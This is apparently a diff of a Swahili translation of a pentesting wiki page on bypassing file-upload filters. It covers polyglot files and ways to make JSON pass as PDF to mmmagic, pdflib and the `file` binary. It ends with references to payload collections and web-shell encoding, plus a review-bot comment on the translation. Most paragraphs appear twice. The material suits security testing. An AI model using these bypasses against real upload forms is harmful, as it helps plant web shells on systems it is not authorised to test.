Manufaa kuu ya polyglot files yako katika uwezo wao wa kukwepa hatua za usalama ambazo hupitia faili kulingana na aina. Katika matumizi ya kawaida, programu nyingi huruhusu aina maalum za faili tu kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuendana na vigezo vya muundo vya aina nyingi za faili, inaweza kuzipitia vikwazo hivi kwa kimyakimya.
Faida kuu ya polyglot files iko katika uwezo wao wa kuepuka viwango vya usalama vinavyoscreen faili kulingana na aina. Mazoezi ya kawaida katika programu mbalimbali ni kuruhusu aina maalum za faili kwa upload—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa utupu vikwazo hivi kwa siri.
Licha ya ufanifu wao, polyglots hukutana na mipaka. Kwa mfano, ingawa polyglot inaweza kwa wakati mmoja kuwa PHAR file (PHp ARchive) na JPEG, mafanikio ya upakiaji wake yanaweza kutegemea sera za jukwaa kuhusu extensions za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, muundo wa pande mbili wa polyglot inaweza isitoshe kuhakikisha upakiaji wake.
Licha ya ufanisi wao, polyglots hukutana na vizingiti. Kwa mfano, wakati polyglot inaweza kuwa PHAR file (PHp ARchive) na JPEG kwa pamoja, mafanikio ya upload yake yanaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazokubaliwa, uraia wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha upload yake.
Taarifa zaidi: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Kupakia JSON halali kana kwamba ni PDF
### Upload valid JSONs like if it was PDF
Jinsi ya kuepuka utambuzi wa aina za faili kwa kupakia faili ya JSON halali hata kama haikuruhusiwa kwa kuigiza kuwa ni faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
Jinsi ya kuepuka detection za aina ya faili kwa kupakia faili halali ya JSON hata kama haikuruhusiwa kwa kuiga faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmmagic` library**: Iwapo tu magic bytes za `%PDF` ziko katika bytes za kwanza 1024 basi inachukuliwa kuwa halali (angalia mfano kwenye post)
- **`pdflib` library**: Ongeza muundo wa PDF bandia ndani ya field ya JSON ili library ithink ni pdf (angalia mfano kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa zaidi ya hiyo ili isiweze kuchambua maudhui kama json, kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF
- **`mmmagic` library**: Iwapo tu magic bytes `%PDF` ziko katika 1024 ya kwanza, inachukuliwa kuwa halali (pata mfano kutoka kwenye post)
- **`pdflib` library**: Weka muundo bandia wa PDF ndani ya field ya JSON ili library ianze kuifikiria kuwa ni pdf (pata mfano kutoka kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa kuliko hiyo ili isiweze kuchambua yaliyomo kama json kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani kuwa ni PDF
## Marejeleo
## Marejeo
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files
- https://github.com/modzero/mod0BurpUploadScanner
- https://github.com/almandin/fuxploider
- https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html
- https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
- https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
- https://blog.doyensec.com/2025/01/09/cspt-file-upload.html
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
- [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
- [https://github.com/almandin/fuxploider](https://github.com/almandin/fuxploider)
- [https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)
- [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
- [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
- [https://blog.doyensec.com/2025/01/09/cspt-file-upload.html](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)
- [usd HeroLab Gibbon LMS arbitrary file write (CVE-2023-45878)](https://herolab.usd.de/security-advisories/usd-2023-0025/)
- [NVD CVE-2023-45878](https://nvd.nist.gov/vuln/detail/CVE-2023-45878)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
- [The Art of PHP: CTFborn exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
- [CVE-2024-21546 NVD entry](https://nvd.nist.gov/vuln/detail/CVE-2024-21546)
- [PoC gist for LFM .php. bypass](https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca)
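Review bot: the vi substitution in the hex-editor step is altered by this commit: `:%s/xxA/..\//g` becomes `:%s/xxA/../g`, which replaces `xxA` with `..` rather than with `../`, so the new command no longer does what the sentence above it describes (`kubadilisha "xxA" kuwa "../"`). A translation change should leave the command text untouched; restore the original line. Several headings are also reverted from Swahili to English in the same hunk, against the direction of the commit: `## Kuingiza PHP Shell kwenye PNG` → `## Embedding PHP Shell on PNG`, `Taarifa zaidi:` → `More information in:` (twice), and `### Kupakia JSON halali kana kwamba ni PDF` → `### Upload valid JSONs like if it was PDF`; keep the Swahili versions. Minor: the ImageTragic line keeps `**(ImageMagick , 7.0.1-1)**` with a stray comma where a version comparison was presumably intended; check the source wording, and the fence around `push graphic-context ... pop graphic-context` has no language tag while the other blocks in this file do.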